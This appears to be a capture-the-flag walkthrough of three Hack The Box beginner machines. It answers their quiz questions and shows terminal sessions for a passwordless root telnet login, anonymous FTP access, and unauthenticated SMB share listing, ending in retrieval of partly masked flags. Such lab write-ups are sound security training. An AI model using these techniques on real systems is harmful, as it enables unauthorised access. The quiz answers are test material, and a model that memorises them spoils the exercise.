Meow Machine (Telnet)
Teory
What does the acronym VM stand for?
1
Virtual Machine
What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
1
Terminal
What service do we use to form our VPN connection into HTB labs?
1
openvpn
What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?
1
tun
What tool do we use to test our connection to the target with an ICMP echo request?
1
ping
What is the name of the most common tool for finding open ports on a target?
1
nmap
What service do we identify on port 23/tcp during our scans?
1
telnet
What username is able to log into the target over telnet with a blank password?
1
root
Practical
Now We are to trying to connect Telnet port 23 with the nexts commands
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ telnet 10.129.53.52
Trying 10.129.53.52...
Connected to 10.129.53.52.
Escape character is '^]'.
root
....
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: root
....
root@Meow:~#
root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
j89************o
Fawn Machine (FTP)
FTP Services
In this case we are responses the questiosn about this service:
What does the 3-letter acronym FTP stand for?
1
File Transfer Protocol
That Web can help you with some information
Which port does the FTP service listen on usually?
1
Port 21
What acronym is used for the secure version of FTP?
1
SFTP (Secure Ffile Transfer Protocol)
From your scans, what version is FTP running on the target?
1
2
3
nc -vn 10.129.157.27 21
....
vsFTPd 3.0.3
1. From your scans, what OS type is running on the target? 2. What is username that is used over FTP when you want to log in without having an account? 3. What is the response code we get for the FTP message ‘Login successful’?
1
2
3
4
5
6
7
8
9
10
$ftp 10.129.157.27
Connected to 10.129.157.27.
220 (vsFTPd 3.0.3)
Name (10.129.157.27:lazy29t): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
So the answers are:
UNIXanonymous230
There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files?
1
2
3
4
5
6
ftp> ls
229 Entering Extended Passive Mode (|||26254|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> cat flag.txt
What is the command used to download the file we found on the FTP server?
1
2
3
4
5
6
ftp>get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||64477|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***********************************| 32 183.82 KiB/s 00:00 ETA
226 Transfer complete.
1
get
Submit the flag
1
2
3
4
~/Desktop/HTB/StartPoint$ ls
flag.txt
~/Desktop/HTB/StartPoint$ cat flag.txt
4g5**************e
Dancing Machine (SMB)
What does the 3-letter acronym SMB stand for?
1
Server Message Block
What port does SMB use to operate at?
1
445
What is the service name for port 445 that came up in our Nmap
1
2
3
4
$ nmap -p445 -sV -v --min-rate 5000 10.129.168.26
....
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
How many shares are there on Dancing?
1
2
3
4
5
6
7
8
9
smbclient --no-pass -L 10.129.168.26 1 ⨯
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
- The answer is: 4
1
2
smbclient //10.129.50.160/WorkShares 1 ⨯
Enter WORKGROUP\lazy29t's password:
1
2
3
4
5
smb: \> ls
. D 0 -
.. D 0 -
Amy.J D 0 -
James.P D 0 -
1
2
3
4
5
6
smb: \> cd James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 01:38:03 2021
.. D 0 Thu Jun 3 01:38:03 2021
flag.txt A 32 Mon Mar 29 02:26:57 2021
1
2
3
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)